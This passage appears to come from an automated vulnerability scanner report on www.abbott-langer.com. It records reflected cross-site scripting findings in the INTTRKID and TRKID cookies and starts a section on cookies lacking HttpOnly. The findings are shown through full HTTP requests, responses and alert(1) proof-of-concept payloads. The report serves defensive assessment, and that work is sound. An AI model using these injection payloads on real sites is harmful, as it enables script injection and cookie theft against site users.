Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A57%3A47%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<img src="/SiteTracker/index.cfm?FuseAction=SiteTracker.PageHit&TrkIDVar=&IntTrkIDVar=55b42"onerror="alert(1)"0a41ec0de0b&WebsiteID=16&ReturnImage=Yes&JavaScript=No&UUID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryStr
...[SNIP]...

1.10. http://www.abbott-langer.com/index.cfm [INTTRKID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the INTTRKID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea89"%3balert(1)//291180413d4 was submitted in the INTTRKID cookie. This input was echoed as bea89";alert(1)//291180413d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=bea89"%3balert(1)//291180413d4; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=bea89%22%3Balert%281%29%2F%2F291180413d4;path=/
Set-Cookie: INTTRKID=bea89%22%3Balert%281%29%2F%2F291180413d4;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: INTTRKID=bea89%22%3Balert%281%29%2F%2F291180413d4;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A58%3A01%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "bea89";alert(1)//291180413d4", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8
...[SNIP]...

1.11. http://www.abbott-langer.com/index.cfm [TRKID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the TRKID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8612"onerror%3d"alert(1)"07439aee987 was submitted in the TRKID cookie. This input was echoed as f8612"onerror="alert(1)"07439aee987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=f8612"onerror%3d"alert(1)"07439aee987; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:54:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=f8612%22onerror%3D%22alert%281%29%2207439aee987;path=/
Set-Cookie: TRKID=f8612%22onerror%3D%22alert%281%29%2207439aee987;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=f8612%22onerror%3D%22alert%281%29%2207439aee987;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A54%3A42%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<img src="/SiteTracker/index.cfm?FuseAction=SiteTracker.PageHit&TrkIDVar=f8612"onerror="alert(1)"07439aee987&IntTrkIDVar=&WebsiteID=16&ReturnImage=Yes&JavaScript=No&UUID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=
...[SNIP]...

1.12. http://www.abbott-langer.com/index.cfm [TRKID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The value of the TRKID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb9a"%3balert(1)//90d5530fa78 was submitted in the TRKID cookie. This input was echoed as 2eb9a";alert(1)//90d5530fa78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=2eb9a"%3balert(1)//90d5530fa78; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:54:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=2eb9a%22%3Balert%281%29%2F%2F90d5530fa78;path=/
Set-Cookie: TRKID=2eb9a%22%3Balert%281%29%2F%2F90d5530fa78;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=2eb9a%22%3Balert%281%29%2F%2F90d5530fa78;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A54%3A58%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "2eb9a";alert(1)//90d5530fa78", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-51
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.abbott-langer.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
